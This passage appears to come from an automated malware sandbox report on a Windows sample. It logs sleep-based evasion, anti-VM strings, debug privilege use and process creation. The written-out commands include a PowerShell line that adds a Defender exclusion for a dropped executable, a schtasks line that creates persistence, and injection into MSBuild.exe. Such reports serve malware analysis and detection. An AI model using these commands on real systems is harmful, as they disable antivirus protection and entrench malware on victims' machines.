                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199719
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1196985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1196860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1196735
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7173Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1570Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 947Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1839Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8744
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe TID: 6700Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7496Thread sleep count: 947 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7496Thread sleep count: 1839 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99672s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99453s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99343s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99234s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99125s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -99014s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -98890s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -98781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -98672s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -98562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480Thread sleep time: -98453s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe TID: 7384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -24903104499507879s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -100000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7736Thread sleep count: 1093 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99890s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7736Thread sleep count: 8744 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99779s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99671s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99562s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99453s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99343s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99234s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99124s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -99015s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98906s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98796s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98578s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98468s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98359s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98250s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98140s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -98030s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -97921s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -97812s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -97703s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -97593s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199955s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199828s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199719s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199610s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199485s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199360s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199235s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1199110s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198985s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198860s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198735s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198610s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198485s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198360s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198235s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1198110s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197985s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197860s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197735s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197610s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197485s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197360s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197235s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1197110s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1196985s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1196860s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -1196735s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99672Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99014Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98672Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98453Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99779
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99671
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99562
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99453
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99343
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99234
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99124
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99015
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98796
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98578
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98468
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98359
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97921
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97812
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97703
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199955
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199719
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1198110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1197110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1196985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1196860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1196735
                        Source: jYRIGnZlROed.exe, 00000009.00000002.1693998023.00000000013A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: MSBuild.exe, 0000000D.00000002.4082602524.0000000006129000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1661949641.0000000001272000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: MSBuild.exe, 00000008.00000002.1682457082.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmpJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
